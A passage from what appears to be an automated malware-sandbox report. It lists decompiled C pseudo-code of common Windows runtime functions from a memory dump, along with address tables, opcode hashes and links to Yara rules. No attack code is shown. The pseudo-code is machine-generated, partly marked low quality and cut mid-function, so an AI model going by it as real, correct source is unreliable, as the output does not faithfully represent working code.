												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E046913C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L046777F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04699650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0465c608
0x0465c615
0x0465c625
0x0465c62d
0x0465c635
0x0465c640
0x0465c680
0x0465c687
0x0465c688
0x0465c689
0x0465c694
0x0465c694
0x0465c642
0x0465c64a
0x0465c697
0x046c7a25
0x046c7a2b
0x046c7a2e
0x046c7a30
0x046c7bea
0x046c7bea
0x00000000
0x046c7bea
0x046c7a36
0x046c7a43
0x046c7a48
0x046c7a4c
0x046c7a4e
0x00000000
0x00000000
0x046c7a58
0x046c7a5a
0x046c7a5b
0x046c7a5c
0x046c7a5d
0x046c7a63
0x046c7a64
0x046c7a6a
0x046c7a6c
0x046c7a6e
0x046c79cb
0x046c79cb
0x046c79ce
0x046c79d0
0x046c7a98
0x046c7a9b
0x046c7a9b
0x046c7a9e
0x046c7aa1
0x046c7bbe
0x046c7bbe
0x046c7bc0
0x046c7be0
0x046c7be0
0x046c7a01
0x046c7a01
0x046c7a05
0x046c7a07
0x046c7a15
0x046c7a15
0x046c7a1a
0x00000000
0x046c7a1a
0x046c7bc2
0x046c7bc6
0x046c7bc9
0x046c7bcd
0x046c7bcf
0x046c79e6
0x046c79e6
0x046c79eb
0x046c79eb
0x046c79ef
0x046c79f1
0x00000000
0x00000000
0x046c79f3
0x046c79f5
0x046c79ff
0x046c79ff
0x00000000
0x046c79ff
0x046c79f7
0x046c79fd
0x00000000
0x00000000
0x00000000
0x046c79fd
0x046c7bd5
0x046c7bd8
0x00000000
0x00000000
0x046c7ba9
0x046c7bac
0x046c7bb0
0x046c7bb1
0x046c7bb1
0x046c7bb6
0x00000000
0x046c7bb6
0x046c7aa7
0x046c7aaa
0x00000000
0x00000000
0x046c7ab2
0x046c7ab3
0x046c7ab5
0x046c7aec
0x046c7aef
0x046c7b25
0x046c7b28
0x046c7b62
0x046c7b64
0x046c7b8f
0x046c7b92
0x046c7b96
0x046c7b98
0x00000000
0x00000000
0x046c7b9e
0x046c7b9f
0x046c7ba3
0x00000000
0x046c7ba3
0x046c7b66
0x046c7b68
0x046c7ae2
0x046c7ae2
0x00000000
0x046c7ae2
0x046c7b6e
0x046c7b72
0x046c7b75
0x046c7b81
0x046c7b85
0x046c7b87
0x00000000
0x00000000
0x046c7b31
0x046c7b34
0x046c7b3c
0x046c7b45
0x046c7b46
0x046c7b4f
0x046c7b51
0x046c7b57
0x046c7b59
0x046c7b59
0x00000000
0x046c7b59
0x046c7b77
0x00000000
0x046c7b77
0x046c7b2a
0x00000000
0x046c7b2a
0x046c7af1
0x046c7af3
0x00000000
0x00000000
0x046c7afb
0x046c7afc
0x046c7afe
0x00000000
0x00000000
0x046c7b00
0x046c7b03
0x00000000
0x00000000
0x046c7b05
0x046c7b09
0x046c7b0d
0x046c7b0f
0x00000000
0x00000000
0x046c7b18
0x046c7b1d
0x00000000
0x046c7b1d
0x046c7ab7
0x046c7ab9
0x00000000
0x00000000
0x046c7abf
0x046c7ac1
0x00000000
0x00000000
0x046c7ac3
0x046c7ac6
0x00000000
0x00000000
0x046c7ac8
0x046c7acc
0x046c7ad0
0x046c7ad2
0x00000000
0x00000000
0x046c7adb
0x00000000
0x046c7adb
0x046c79d6
0x046c79d9
0x046c79dc
0x046c7a91
0x046c7a94
0x00000000
0x046c7a94
0x046c79e2
0x00000000
0x046c79e2
0x046c7a74
0x046c7a7a
0x00000000
0x00000000
0x046c7a8a
0x046c7a21
0x046c7a21
0x00000000
0x046c7a21
0x0465c650
0x0465c651
0x0465c656
0x0465c65c
0x0465c65d
0x0465c663
0x0465c664
0x0465c66a
0x0465c66e
0x046c79c5
0x046c79c7
0x00000000
0x046c79c7
0x0465c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3992ad7a67fffbbdb5d70255d9ede5270c03d7cb60134b2d4d76ac131e39f94d
Instruction ID: a9049d20ccd2fffbe0e96ada5d8dddb840f3ec05c1b76d23c35a07d44234e184
Opcode Fuzzy Hash: 3992ad7a67fffbbdb5d70255d9ede5270c03d7cb60134b2d4d76ac131e39f94d
Instruction Fuzzy Hash: C5816A756042469BDB25CE54C880A7AB3A9FB94396F14886EED469B340F330FD45CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 046EB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E046EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4747b9c; // 0x0
				_t124 = L04674620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04699800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E046995B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E046995D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L046777F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04699910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E046995D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4747b9c; // 0x0
									_t92 = L04674620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04699910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0465A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E046EE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E046EE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E046995B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x046eb8d9
0x046eb8e4
0x00000000
0x046eb8e6
0x046eb8f3
0x046eb8f5
0x046eb8f5
0x046eb8f8
0x046eb920
0x046eb924
0x046eb936
0x046eb939
0x046eb93d
0x046eb948
0x046eb9a0
0x046eb9a0
0x046eb9a4
0x046eb9bf
0x046eb9c4
0x046eb9c6
0x046eb9cd
0x046eb9d1
0x046ebad4
0x046ebad8
0x046ebada
0x046ebadc
0x046ebadc
0x046ebadf
0x046ebae0
0x046ebae2
0x046ebae4
0x046ebaec
0x046ebaee
0x046ebaf0
0x046ebaf0
0x046ebaec
0x046ebafb
0x046ebafc
0x046ebafe
0x046ebb01
0x046ebb01
0x00000000
0x046ebb06
0x046eb9d7
0x046eb9db
0x046eb9db
0x046eb9de
0x046eb9de
0x046eb9e4
0x046eb9e7
0x046eb9ea
0x046eb9ec
0x046eb9ef
0x046eb9f3
0x046eba1b
0x046eba1b
0x046eba23
0x046eba24
0x046eba27
0x046eba2a
0x046eba2b
0x046eba2e
0x046eba30
0x046eba37
0x046eba3f
0x046eba9c
0x046ebaa2
0x046ebb13
0x046ebb15
0x046ebaae
0x046ebaae
0x046ebab3
0x046ebab5
0x046ebaba
0x046ebac8
0x046ebac8
0x046ebaba
0x046ebacd
0x046ebacf
0x00000000
0x046ebacf
0x046ebb1a
0x00000000
0x046ebb1c
0x046ebaa7
0x046ebb11
0x00000000
0x046ebb11
0x046ebaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x046eba41
0x046eba41
0x046eba41
0x046eba58
0x046eba5d
0x046eba62
0x00000000
0x00000000
0x046eba64
0x046eba67
0x046eba68
0x046eba69
0x046eba6c
0x046eba6f
0x046eba71
0x046eba78
0x046eba80
0x00000000
0x00000000
0x046eba90
0x046eba90
0x046eba97
0x00000000
0x046eba97
0x046eb9f5
0x046eb9f7
0x046eb9f7
0x046eb9fa
0x046eba03
0x046eba07
0x046eba0c
0x046eba10
0x046eba17
0x00000000
0x046eb9f7
0x046eb9a6
0x046eb9a8
0x046eb9af
0x046eb9b3
0x00000000
0x00000000
0x046eb9b9
0x00000000
0x046eb9b9
0x046eb94d
0x046eb98f
0x046eb995
0x046eb999
0x046eb960
0x046eb967
0x046eb968
0x046eb96a
0x00000000
0x046eb96a
0x046eb99b
0x046eb99e
0x00000000
0x00000000
0x00000000
0x046eb99e
0x046eb951
0x046eb954
0x046eb95a
0x046eb95e
0x046eb972
0x046eb979
0x046eb97d
0x046eb97f
0x046eb980
0x046eb982
0x046eb984
0x00000000
0x046eb984
0x00000000
0x046eb926
0x00000000
0x046eb926

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47d9c98ce285d79137d9188db44b61a9ce44df1ca11e22c15fb0538beabe109
Instruction ID: f585ad666a268e8edd40264481837ee12b5aabdd164b9f47327f3d9bbaea1859
Opcode Fuzzy Hash: f47d9c98ce285d79137d9188db44b61a9ce44df1ca11e22c15fb0538beabe109
Instruction Fuzzy Hash: F671FC72201701AFEB32DF1AC844F66BBE5EB40B24F24452CE6558B2A0FBB5F945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 046552A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E046552A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0466EEF0(0x47479a0);
					_t104 =  *0x4748210; // 0x2881ea0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0466EB70(_t93, 0x47479a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04699890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0466EEF0(0x47479a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0466EB70(0, 0x47479a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2881ead
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0468F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0466EEF0(0x47479a0);
									__eflags =  *0x4748210 - _t104; // 0x2881ea0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4748210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E046D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0466EB70(_t95, 0x47479a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E046995D0();
											L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E046995D0();
											L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0466EB70(_t93, 0x47479a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E046995D0();
										L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E046995D0();
										L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0468F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x046552a5
0x046552ad
0x046552b0
0x046552b3
0x046552b7
0x046552ba
0x046552bf
0x046552c4
0x046552cc
0x00000000
0x00000000
0x046552ce
0x046552d9
0x046552dd
0x046552e7
0x046552f7
0x046552f9
0x046552fd
0x046b0dcf
0x046b0dd5
0x046b0dd6
0x046b0dd7
0x046b0dd8
0x046b0dd9
0x046b0dde
0x046b0ddf
0x046b0de0
0x046b0de1
0x046b0de2
0x046b0de5
0x046b0dea
0x046b0dec
0x046b0f60
0x046b0f64
0x046b0f70
0x046b0f76
0x046b0f79
0x046b0f79
0x00000000
0x046b0f64
0x046b0df2
0x046b0df7
0x046b0e04
0x046b0e0d
0x046b0e0d
0x046b0e10
0x046b0e1a
0x046b0e1c
0x046b0e4c
0x046b0e52
0x046b0e61
0x046b0e67
0x046b0e6b
0x046b0e70
0x046b0e76
0x046b0ed7
0x046b0edc
0x046b0ee0
0x046b0ee6
0x046b0eea
0x046b0eed
0x046b0ef0
0x046b0ef3
0x046b0ef6
0x046b0ef9
0x046b0efe
0x046b0f01
0x046b0f01
0x046b0f0b
0x046b0f12
0x046b0f16
0x046b0f18
0x046b0f1b
0x046b0f2c
0x046b0f31
0x046b0f31
0x046b0f35
0x046b0f39
0x046b0f3a
0x046b0f3c
0x046b0f3f
0x046b0f50
0x046b0f55
0x046b0f55
0x046b0f59
0x046552eb
0x046552f1
0x046552f1
0x046b0e7d
0x046b0e84
0x046b0e88
0x046b0e8a
0x046b0e8d
0x046b0e9e
0x046b0ea3
0x046b0ea3
0x046b0ea7
0x046b0eaf
0x046b0eb3
0x046b0eb9
0x046b0eb9
0x046b0ebc
0x046b0ecd
0x046b0ecd
0x00000000
0x046b0eb3
0x046b0e21
0x046b0e2b
0x046b0e2f
0x046b0e30
0x046b0e3a
0x046b0e3f
0x046b0e41
0x00000000
0x00000000
0x046b0e47
0x00000000
0x046b0e47
0x046b0df9
0x046b0dfe
0x00000000
0x00000000
0x00000000
0x046b0dfe
0x04655303
0x04655307
0x00000000
0x04655309
0x00000000
0x04655309
0x04655307
0x046552e9
0x046552e9
0x00000000
0x046552e9
0x0465530e
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e80f3a1c939cf340b9439163260142c441399a08d2b7ae8a5913a38abae91c
Instruction ID: 3417d5ba98bdfd31888d91642216376fadd9695e0d9264e165999a4446cf75ce
Opcode Fuzzy Hash: 90e80f3a1c939cf340b9439163260142c441399a08d2b7ae8a5913a38abae91c
Instruction Fuzzy Hash: 8151B870205342ABE720AF68C944B67BBE8FF90714F10492EE89687760F774F845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0466EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0466EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04659080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04652D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0466ef4b
0x0466ef4d
0x0466ef57
0x0466f0bd
0x0466f0c2
0x0466f0d2
0x0466f0d2
0x0466f0c2
0x0466ef5d
0x0466ef5f
0x0466ef67
0x0466ef6a
0x0466ef6d
0x0466ef74
0x0466ef7f
0x0466ef82
0x0466ef82
0x0466ef86
0x0466ef88
0x0466ef8c
0x0466ef8f
0x0466ef8f
0x0466ef8f
0x00000000
0x0466ef91
0x0466ef93
0x0466efc4
0x0466efc4
0x0466efc4
0x0466efca
0x0466efd0
0x0466f0a6
0x00000000
0x00000000
0x0466f0af
0x046bbb06
0x046bbb0a
0x0466f0b5
0x0466f0b5
0x0466f0b5
0x0466f0b5
0x00000000
0x0466efd6
0x0466efd9
0x0466f0de
0x0466f0e2
0x0466efdf
0x0466efdf
0x0466efdf
0x0466efe5
0x046bbafc
0x046bbafc
0x0466efe5
0x0466efeb
0x0466efed
0x0466f00f
0x0466f011
0x0466f01a
0x0466f01d
0x0466f021
0x0466f028
0x0466f029
0x0466f029
0x0466f02c
0x00000000
0x0466f02c
0x0466eff3
0x0466eff9
0x0466f0ea
0x0466f0ed
0x0466f0ef
0x00000000
0x0466f0ef
0x0466f003
0x046bbb12
0x0466f045
0x0466f049
0x0466f051
0x0466f09e
0x0466f0a0
0x0466f0a0
0x0466f09e
0x0466f053
0x0466f064
0x0466f064
0x0466f06b
0x046bbb1a
0x046bbb1a
0x0466f071
0x0466f071
0x0466f07d
0x0466f082
0x0466f08f
0x0466f08f
0x0466f009
0x0466f00d
0x00000000
0x0466f00d
0x0466efd0
0x0466ef97
0x0466efa5
0x0466efaa
0x00000000
0x0466efac
0x0466efac
0x0466efac
0x00000000
0x0466efb2
0x0466f036
0x0466f03a
0x0466f040
0x0466f090
0x00000000
0x0466f092
0x0466f042
0x00000000
0x0466f042
0x0466efb7
0x0466efb9
0x0466efbc
0x0466efb0
0x0466efb0
0x00000000
0x0466efbe
0x0466efbe
0x0466efc1
0x00000000
0x0466efc1
0x0466efbc
0x0466efaa
0x0466ef91

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 745de6f51d84d4e55831e606d6025cfcd5fa4c52bbddf1ae81439320925d0d39
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 0B51F334E04245EFDB18CF68D1A07AEBBB1AF25314F1881ACD54657381F376B989D781

Uniqueness

Uniqueness Score: -1.00%

Function 0472740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0472740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
